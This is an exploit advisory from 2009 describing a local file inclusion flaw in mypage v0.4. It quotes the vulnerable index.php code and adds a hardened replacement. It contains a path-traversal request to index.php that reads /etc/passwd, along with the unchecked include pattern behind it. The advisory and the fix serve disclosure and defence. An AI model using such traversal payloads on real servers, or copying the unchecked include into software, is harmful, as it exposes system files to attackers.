
# Title : mypage v0.4 Local File Inclusion Vulnerability
# Published : 2009-12-22
# Author : BAYBORA


#############################################################
# mypage0.4 LFI Vulnerability

# Author: BAYBORA

# Site: www.1923turk.biz

##############################################################

# Exploit:


Vuln file: index.php?page=LFI


Exploit:


POST http://server/index.php?page=../../../../../../../../etc/passwd

index.php

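if (isset($_GET['page'])) {
...
    // the user-controlled 'page' parameter is appended to the content directory unchecked
    $inhalt = $inhaltsordner . "/" . $_GET['page'];
}
...
// only the literal "///" is removed; "../" sequences pass through unchanged
$inhalt = str_replace("///", "", $inhalt);
if (FALSE == include $inhalt) { echo $notfound; }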
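
A hardened form of the include logic in the index.php excerpt above, shown as an added example; it is not code from mypage or from the advisory's author. $inhaltsordner and $notfound are the names used in the excerpt; their values, the resolve_page() helper, the permitted file-name pattern and the default page name are assumptions made for illustration.

```php
<?php
// Added example: contain the include to the content directory.
// $inhaltsordner / $notfound are names from the quoted index.php;
// the values assigned here are assumed, not taken from mypage.
$inhaltsordner = __DIR__ . '/inhalt';
$notfound      = 'Page not found.';

/**
 * Hypothetical helper: map a user-supplied page name to a file inside
 * $baseDir, or return null if the name is malformed or escapes $baseDir.
 */
function resolve_page(string $baseDir, string $page): ?string
{
    // Accept only a plain file name: no slashes, no "..", no NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_\-]+(\.[A-Za-z0-9]+)?\z/', $page)) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }

    // realpath() canonicalises the path (resolves "..", symlinks, "//").
    $target = realpath($base . DIRECTORY_SEPARATOR . $page);
    if ($target === false || !is_file($target)) {
        return null;
    }

    // Containment check: the canonical path must still sit under $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// 'index' as the default page is an assumption.
$page   = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : 'index';
$inhalt = resolve_page($inhaltsordner, $page);

if ($inhalt === null) {
    http_response_code(404);
    echo $notfound;
} else {
    include $inhalt;
}
```

With this check, a page value containing "../" is rejected by the name pattern, and the realpath() comparison still catches a symlink inside the content directory that points elsewhere.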